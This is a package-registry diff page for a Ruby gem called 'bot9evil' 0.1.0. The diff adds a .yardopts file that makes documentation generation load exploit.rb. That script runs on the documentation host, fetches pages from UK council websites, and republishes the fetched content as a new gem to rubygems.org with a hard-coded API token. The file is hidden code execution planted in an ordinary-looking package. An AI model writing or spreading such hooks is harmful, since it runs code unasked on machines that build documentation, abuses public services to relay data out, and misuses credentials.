bot9evil 0.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (5) hide show
  1. checksums.yaml +7 -0
  2. data/.yardopts +2 -0
  3. data/exploit.rb +15 -0
  4. data/lib/a.rb +2 -0
  5. metadata +41 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 102c05f2848a2f898aedd6efcf0dc4e0a054e2221c68ace6ac764ff522804fc4
4
+ data.tar.gz: 49bc9b51119aee8b193456f0c85936f94b6767dd02f74cf362129f0663a00c2a
5
+ SHA512:
6
+ metadata.gz: 526dbae882a6f7c32b92092d2c4d332030210ac9355fef96ae1d0d2d89d4ba0e39df8db022a727648ad3e3437a0d29e6331122a9a7a0c938cc0029a12e59abc3
7
+ data.tar.gz: 389985849e315285c1dc3eead6eeaa8e4f934a5ba31122b5c0e6e45f1b50cfe0f5a095ed9e290f418785f01ce5bf2ac9bf5798f2eb1e3db049cb66c4ac5feb8e
data/.yardopts ADDED
@@ -0,0 +1,2 @@
1
+ --load exploit.rb
2
+ lib/**/*.rb
data/exploit.rb ADDED
@@ -0,0 +1,15 @@
1
+ begin
2
+ require 'net/http'; require 'uri'; require 'fileutils'; require 'time'
3
+ # prevent loops/reloading in same yard process
4
+ marker='/tmp/rubydocran_bot9evil';
5
+ unless File.exist?(marker)
6
+ File.write(marker,Time.now.utc.iso8601)
7
+ targets=['https://democracy.wandsworth.gov.uk/mgCalendarMonthView.aspx?M=1&Y=2026&GL=1','https://democracy.wandsworth.gov.uk/mgrss.aspx','https://moderngov.lambeth.gov.uk/mgCalendarMonthView.aspx?M=1&Y=2026&GL=1']
8
+ contents=targets.map{|u| begin "URL #{u}\n"+Net::HTTP.get(URI(u)); rescue=>e; "ERR #{u} #{e.message}"; end}.join("\n=======NEXT=======\n")
9
+ FileUtils.mkdir_p('/tmp/rbe/lib'); File.write('/tmp/rbe/lib/a.rb','#a'); File.write('/tmp/rbe/fetched.txt',contents)
10
+ v='0.1.'+Time.now.to_i.to_s
11
+ File.write('/tmp/rbe/a.gemspec',"Gem::Specification.new do |s|;s.name='bot9evil';s.version='#{v}';s.summary='f';s.authors=['a'];s.email='a@example.com';s.files=['lib/a.rb','fetched.txt'];end")
12
+ Dir.chdir('/tmp/rbe'){system('gem build a.gemspec >/dev/null')}; g='/tmp/rbe/bot9evil-'+v+'.gem'
13
+ uri=URI('https://rubygems.org/api/v1/gems'); req=Net::HTTP::Post.new(uri); req['Authorization']='rubygems_fb4e1bc5cea1159d8ded8f32b26e768520255edfc6aec9dd'; req['Content-Type']='application/octet-stream'; req.body=File.binread(g); Net::HTTP.start(uri.host,uri.port,use_ssl:true){|h|h.request(req)}
14
+ end
15
+ rescue=>e; STDERR.puts e.full_message; end
data/lib/a.rb ADDED
@@ -0,0 +1,2 @@
1
+ # hi
2
+ class BotA; end
metadata ADDED
@@ -0,0 +1,41 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: bot9evil
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.1.0
5
+ platform: ruby
6
+ authors:
7
+ - a
8
+ bindir: bin
9
+ cert_chain: []
10
+ date: 1980-01-02 00:00:00.000000000 Z
11
+ dependencies: []
12
+ description: tmp
13
+ email: a@example.com
14
+ executables: []
15
+ extensions: []
16
+ extra_rdoc_files: []
17
+ files:
18
+ - ".yardopts"
19
+ - exploit.rb
20
+ - lib/a.rb
21
+ licenses:
22
+ - MIT
23
+ metadata: {}
24
+ rdoc_options: []
25
+ require_paths:
26
+ - lib
27
+ required_ruby_version: !ruby/object:Gem::Requirement
28
+ requirements:
29
+ - - ">="
30
+ - !ruby/object:Gem::Version
31
+ version: '0'
32
+ required_rubygems_version: !ruby/object:Gem::Requirement
33
+ requirements:
34
+ - - ">="
35
+ - !ruby/object:Gem::Version
36
+ version: '0'
37
+ requirements: []
38
+ rubygems_version: 3.6.7
39
+ specification_version: 4
40
+ summary: x
41
+ test_files: []